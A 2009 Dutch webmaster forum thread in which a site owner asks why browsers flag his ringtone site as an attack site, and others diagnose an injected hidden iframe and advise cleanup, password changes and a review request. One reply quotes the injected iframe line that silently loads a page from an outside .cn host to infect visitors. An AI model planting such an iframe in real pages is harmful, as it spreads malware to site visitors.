Hallo,
Nu ik terug ben van mijn vakantie, kijk ik op mijn site mobieltonen.nl en kom ik het volgende bericht tegen:
Gerapporteerde aanvalsite!
Aanvalsites proberen programma’s te installeren die privéinformatie stelen, uw computer gebruiken om anderen aan te vallen, of uw systeem beschadigen.
Sommige aanvalsites verspreiden bewust gevaarlijke software, maar vele zijn gecompromitteerd zonder de kennis of toestemming van hun eigenaars.
Zou iemand mij kunnen uit leggen wat dit is?
(Oja, ik zie het trouwens alleen in firefox en safari...)
-
17-06-2009, 10:54 #1
Particulier
- Berichten
- 277
- Lid sinds
- 15 Jaar
Gerapporteerde aanvalsite???
-
In de schijnwerper
(Technische) SEO ready teksten: Voor alle onderwerpen (Geen AI)!Freelance / WerkGoedkope 10 Gbps Virtual Private Server (VPS) in Nederland (Met PURE NVMe opslag!)HostingProduct feed grid V1.7 - Creer een affiliate shop in 2 min - WP plugin - V1.7 NU LIVEPHP scripts[BELANGRIJK] Festinger Vault - Download 25.000 thema's en pluginsPromotie -
17-06-2009, 10:57 #2
Particulier
- Berichten
- 267
- Lid sinds
- 19 Jaar
-
17-06-2009, 10:59 #3
Birdwebdesign
- Berichten
- 1.036
- Lid sinds
- 17 Jaar
dat had ik een tijdje geleden ook, bij mij scheen er een lek in scripts te zitten...
-
17-06-2009, 11:01 #4
Particulier
- Berichten
- 277
- Lid sinds
- 15 Jaar
John,
Ik heb dit artikel al gelezen, alleen ik snap er niet veel tot vrijwel niks van..
Betekent dit dat mijn site is gehackt of iets dergelijke..?
-
17-06-2009, 11:03 #5
Particulier
- Berichten
- 756
- Lid sinds
- 16 Jaar
Dit is het probleem:
Code:<iframesrc="http://bigtopfestival.cn:8080/index.php" width=169 height=166 style="visibility: hidden"></iframe>
-
17-06-2009, 11:07 #6
Particulier
- Berichten
- 277
- Lid sinds
- 15 Jaar
Hallo,
Ik heb dit nu verwijderd.
Alleen wat moet ik nu verder nog doen? ( Wachtwoord veranderen ofzo..? )
+ Wat waren eigenlijk de gevolgen van dit iframe?
Tomas.
-
17-06-2009, 11:10 #7
Particulier
- Berichten
- 756
- Lid sinds
- 16 Jaar
Ze hebben ftp toegang, of gebruikgemaakt van een lek in één van je php scripts en dat iframe toegevoegd.
Waarschijnlijk hebben ze je bezoekers geinfecteerd met malware, of ze stelen cookies.
-
17-06-2009, 11:12 #8
Particulier
- Berichten
- 267
- Lid sinds
- 19 Jaar
Vergeet niet om een heroverweging te vragen, zodat die waarschuwing verdwijnt.
-
17-06-2009, 11:15 #9
Particulier
- Berichten
- 277
- Lid sinds
- 15 Jaar
Dus voor de FTP toegang is het dus handig om mijn wachtwoord te veranderen?
-
17-06-2009, 11:18 #10
Particulier
- Berichten
- 267
- Lid sinds
- 19 Jaar
1. Verwijder troep van je site
Origineel gepost door Tomas Smits
2. Pas wachtwoorden aan
3. Vraag om heroverweging
4. Lees artikel: http://www.stopbadware.org/home/security
-
17-06-2009, 11:18 #11
Particulier
- Berichten
- 756
- Lid sinds
- 16 Jaar
Uiteraard, anders doen ze het morgen nogmaals.
Ik zag overigens dat deze jongens zich bezig houden met flash/pdf exploits en trojans.
Ik raad aan ook gelijk even je virusscanner aan te zetten op je pc!
-
17-06-2009, 11:22 #12
Bosman ICT Services
- Berichten
- 4.961
- Lid sinds
- 17 Jaar
Al mijn websites waren vorige week ook besmet geraakt door deze iframes.
Heb mijn hele pc's opnieuw moeten installeren, AVG kon het virus niet verwijderen.
-
17-06-2009, 11:25 #13
Particulier
- Berichten
- 277
- Lid sinds
- 15 Jaar
Hmm,
Ik heb op dit moment op mijn mac nog geen viruscanner..
Maar die ga ik dan zo snel mogelijk een halen.
-
17-06-2009, 11:28 #14
Bosman ICT Services
- Berichten
- 4.961
- Lid sinds
- 17 Jaar
Waarschijnlijk gebruik je filezilla?
Daar had ik namelijk dit probleem mee.
-
17-06-2009, 11:31 #15
Particulier
- Berichten
- 1.034
- Lid sinds
- 18 Jaar
had het ook gezien :-) Origineel gepost door J. Bosman
gelukkig blokkeerde men antivir het ;-)
succes
